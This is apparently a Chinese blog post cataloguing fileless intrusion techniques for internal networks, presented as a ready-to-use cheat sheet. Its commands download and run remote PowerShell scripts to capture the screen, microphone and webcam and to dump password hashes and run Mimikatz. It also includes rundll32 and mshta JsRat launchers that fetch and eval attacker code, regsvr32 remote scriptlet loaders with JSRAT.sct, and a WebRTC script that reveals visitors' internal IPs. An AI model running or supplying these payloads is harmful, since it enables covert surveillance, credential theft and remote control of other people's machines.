内网无文件攻击姿势

Powershell

屏幕监控:

powershell -nop -exec bypass -c “IEX (New-Object 
Net.WebClient).DownloadString(‘http://evi1cg.me/powershell/Show-TargetScreen.ps1’); Show-TargetScreen”

录音:

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1’);GetMicrophoneAudio
-Path $env:TEMP\secret.wav -Length 10 -Alias ‘SECRET’”

摄像头监控:

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1’); Capture-MiniEye -RecordTime 2 -
Path $env:temp\hack.avi”-Path $env:temp\hack.avi”

抓Hash:

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1’);Get-PassHashes

抓明文:

powershell IEX (New-Object Net.WebClient).DownloadString('http://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikat

Empire:

14555940166132.png

Metasploit:

metasploit.png

js

JsRat:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication
";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.
5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.S
end();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WSc
ript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

LocalNetworkScanner:

http://blog.skylined.nl/LocalNetworkScanner/

223801u4zcjrpsnwjnmj0j.png

获取客户端内网IP和外网IP(STUN)

http://github.com/diafygi/webrtc-ips

Firefox 跟 Chrome支持WebRTC可以向STUN服务器请求,返回内外网IP,不同于XMLHttpRequest请求,STUN请求开发者工具当中看不到网络请求的。

//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};
 
    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };
 
    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;
 
    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
 
    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);
 
    //listen for candidate events
    pc.onicecandidate = function(ice){
 
        //skip non-candidate events
        if(ice.candidate){
 
            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
 
            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);
 
            ip_dups[ip_addr] = true;
        }
    };
 
    //create a bogus data channel
    pc.createDataChannel("");
 
    //create an offer sdp
    pc.createOffer(function(result){
 
        //trigger the stun server request
        pc.setLocalDescription(result, function(){});
 
    }, function(){});
}
 
//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});

Demo: http://diafygi.github.io/webrtc-ips/

mshta

启动JsRat:

Mshta javascript:"\..\mshtml,RunHTMLApplication
";document.write();h=new%20ActiveXObject("WinHttp
.WinHttpRequest.5.1");h.Open("GET","http://192.16
8.2.101:9998/connect",false);try{h.Send();b=h.Res
ponseText;eval(b);}catch(e){new%20ActiveXObject("
WScript.Shell").Run("cmd /c taskkill /f /im
mshta.exe",0,true);}

运行JSRAT:

regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll

JSRAT.sct

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
    
            rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
        new ActiveXObject("WScript.Shell").Run(rat,0,true);
    
        ]]>
</script>
</registration>
</scriptlet>

sct

SCT:

regsvr32 /u /s
/i:http://urlto/calc.sct scrobj.dll

calc.sct

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
    >
    <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
    <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
    <!-- That should work over a proxy and SSL/TLS... -->
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
    
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
    
        ]]>
</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    
    function Exec()
    {
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
    }
    
]]>
</script>

</scriptlet>

wsc

Wsc:

rundll32.exe
javascript:"\..\mshtml,RunHTMLApplic
ation
";document.write();GetObject("script
:http://urlto/calc.wsc")

calc.wsc

<?xml version="1.0"?>

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>

</component>
</package>

标签: 内网, 无文件攻击

添加新评论